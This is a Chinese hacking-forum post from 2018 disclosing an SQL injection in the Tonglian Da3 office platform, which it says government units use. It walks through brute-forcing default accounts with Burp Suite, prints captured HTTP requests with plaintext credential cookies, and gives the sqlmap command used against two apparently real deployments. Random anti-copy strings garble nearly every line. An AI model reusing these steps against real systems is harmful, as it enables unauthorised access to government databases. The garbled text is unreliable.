找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1847|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

0 k; S5 [( j3 d% H; E5 N+ X+ L
' t' D. {/ D6 `& j. H3 n2 |

- U: j& V$ C) o) {3 V

9 Y& w4 X6 h/ e: O6 Z 平台简介:) u1 D! w+ U- Q! _% _% g7 \9 @- {! v

0 m. D5 B% C: |4 P

7 H) N1 E* C6 M& N! q$ i5 d  % v5 r+ I' V2 Z7 }& n

& w8 N4 S: }- B

! H5 W( S) V5 L, P5 Q% C 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
; r. Q4 r, M! c" W! V1 @ 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
1 l' h* b4 {% H2 u! ^# a) ^8 O' W同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!7 j- \' L0 E+ P! O( u

: p4 x* K: ^- l9 b

: _2 }# A6 V! \/ i4 p3 v   - c. b; k+ I6 W7 g

, ~/ }% C7 N+ E! X# V2 z/ S

: T& Q5 W" Z0 d; x8 M 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:0 s- z& ^ `; C x' T

2 B' f3 R8 I* Z, |6 d

5 n" T J0 R0 _/ b: W  " j! }/ w+ x+ u( \

( n5 y: ^) }# r# t3 F- {

) q: A+ ^8 t" L% V http://1.1.1.1:7197/cap-aco/#(案例2-); V$ ^0 g& U+ D2 q/ n! p

8 b/ E" O* u R& q- s" ~6 q

4 i; u3 h' U3 f: l6 M) f http://www.XXOO.com (案例1-官网网站)! b+ `3 c1 s4 N$ B& f6 X

& q; |! j+ v6 E# U' G; x: P3 _+ l

2 h* R& f. ~- J3 h& r, S   . u& O) ^) T! p. [; S) M* O* C

' H1 z2 \1 u2 _

( W) A) I! `9 \# _ 漏洞详情: # w% O3 q$ x+ T5 n

# a/ `# W2 r* Z" L( W; x

. e- t/ z" t J8 L  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 8 X8 d' q9 }: I- Q4 q! j) s

* w4 U7 B2 K) o' |. f; S

5 A" J% ^8 [% O7 r. M! D. M, C      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: / |) m& G; `! |

/ ~3 O& y5 ?) e0 I2 }* Y

2 J8 y6 f# t1 M" A   e2 g' U% h' J

, C0 o+ h3 P0 e$ H1 r+ r

" B1 o( |' `5 N! y  3 S- r$ F4 a: z' I2 P6 ~# M: B& J

& j% P6 d4 I1 j. [. [3 r0 A! d

- V: L- s# K9 Q+ G# E& ]. O: i status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: " R! N7 k: Q; a' M; q

" p7 M2 T |, ?) r/ g3 q% O1 g

3 T/ q. L9 `0 ~; Y 1、案例1-官方网站 ' _5 x8 e$ @7 x S& c4 Z

$ n# ]1 Y8 V4 L0 m( v4 M) V

7 u% a- R5 d+ X/ w& G3 M GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.11 ^- E z2 ?4 f7 P' ^, s# T3 I

7 A8 Z y( t$ R& c

$ D. q- {3 h3 o5 g3 E" A Host: www.XXOO.com X( K" l& l/ t" H/ M

- x; V* n- j2 p, g4 f2 Y# S0 U

& e( ?, f' H2 [0 [2 S3 A* M& V Proxy-Connection: Keep-Alive; ~$ @/ R1 j2 H; B: M9 L4 a

8 f% U1 h/ z' S# |

, m, C2 |# d/ q" [7 Y" } Accept: application/json, text/javascript, */*; q=0.01 $ r6 I" h7 k0 r/ [# H! ]

0 Y% `, x v( R% @% D* K

& I6 u; Z9 [/ y Accept-Language: zh-CN 5 _% y ]; k5 b0 Q; M1 |

6 w0 B# L/ o ^2 B5 x1 U/ z$ I

! m' l/ A6 w/ Z0 w7 G. p Content-Type: application/json+ s5 q- b6 ?6 V' ^6 I

4 A0 a5 J4 r9 L& e8 x

: j3 T2 o( Y# ^( ]" X8 { User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko0 d/ A8 f" O4 Z

a, v, V5 E# Z* ]9 E. z* R

! q# T) z' B9 C' k) C X-Requested-With: XMLHttpRequest & b0 N+ B* p/ B* s7 i' r

3 u" s+ O$ F/ j$ d" O. g

6 A: @: k B" y- Q( c9 t Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002; Z5 C4 R$ z7 F M' v6 G# M, y

& `1 n+ h. q# R) m) s

4 A% R8 ?% l% h/ V- ]$ u9 A; D Accept-Encoding: gzip, deflate, sdch 6 I+ {, F5 f1 r$ e: N) Q& j7 K

$ |! Y d) I1 \( Q

9 k$ @- Q( k- r; T# Q# M% Z, M Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e. d% Y% X2 Y' w

' J+ f! |7 J5 B6 I5 r' d0 z: n

2 d- N& o) Y6 i1 d2 W" B1 _- c 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:( h6 e' d: ~5 Q4 A, z& a3 s* ~3 D

: r9 p+ w0 H' E! c

T- j$ D& s# S+ c5 f- |7 W" b   . ^+ W, o4 B/ D* ~

# ]% k! Y/ z; q7 K0 M( v- h

. O/ o! K' ?% @# S% D$ C; Q0 h+ t6 Z  ; H6 v( Y9 _5 O; k

. X& g% Y- K4 P; L8 `

9 X$ }0 ` Q+ u& o; y2 e3 ^   3 z( R9 o: c5 N: ^- D6 ?7 b

8 m6 p. f% M5 y4 g4 _7 c/ @& l' O

n4 f7 h L$ P+ T   + O2 A4 f) M3 O' S

7 x5 I9 U) s& E

: {! @% n2 a I# E, O  7 `0 r" D- M7 h$ W; m0 l8 X

# D" T# R5 v: @; r4 r* g

5 O8 ~! C: @1 K& s" D* r 2、案例2-某天河云平台7 T. F8 B$ Q. w( ]8 j

* N3 l# U. V) k, x& |

$ ~/ i6 P8 J: _; N# G8 b0 d6 n GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 |, W1 ^5 R" x! _4 @7 k6 ~- ?

% L! z+ r" }' m- J9 j

- C+ y1 y& H: l& f' @( A. F1 k" C Host: 1.1.1.:7197 3 M! L8 A: n8 v1 y* z

: F' r4 K! Y1 S& z. l$ p/ W

$ J% M' [# l: U9 q8 z8 E Accept: application/json, text/javascript, */*; q=0.01 4 S+ P- X; S- w; _( V y7 E

- q' S" r7 M8 K6 E

& C7 ]4 o2 |! ^, I; { X-Requested-With: XMLHttpRequest 5 n% U3 s$ U5 H8 n

$ G. [2 O" r! Z6 c; L

" u* s) [2 }) B. i0 c User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 # V: e: K# E+ [

5 ]* L- a: z1 _+ B7 F* X I

0 [: f, s6 T2 z+ i2 o& H Content-Type: application/json & R$ }7 Z( W( A9 R. V( X

- I% `. f3 m G1 r J6 h

! _. e% N: a) b! F Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 $ s, b# j8 S( B3 J0 n U: L

; w, U* Q7 M$ N; ]. ]& Z

& n. G$ `, ^9 A7 x1 z) m Accept-Language: zh-CN,zh;q=0.8 * w$ k: Z! {5 S# r e

O" H* w6 v0 ^

" M0 C5 A9 R* j. @% j" v h+ o Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1) `" ^# y$ D5 Z9 g

c+ B6 o4 r) K+ F @

1 ~1 W: I) M9 x ~# t Connection: close ! }8 g# @' r7 D6 O& _

# t! h w- |# `: e! m- Q( w

" J X0 B0 @; G. X+ q9 _( f* p* g; p 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:3 d( e% `. B7 H% s$ I6 V3 P

' ]6 p$ X' g/ Q

. y. K* v4 r( \4 l   ' L8 d) O* Q! K. c1 i& Q- p9 W

1 C; z# o' [% K& `% E7 A

2 j$ F6 N8 k8 D
% r D c4 o+ L4 X% o; [3 X) _

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表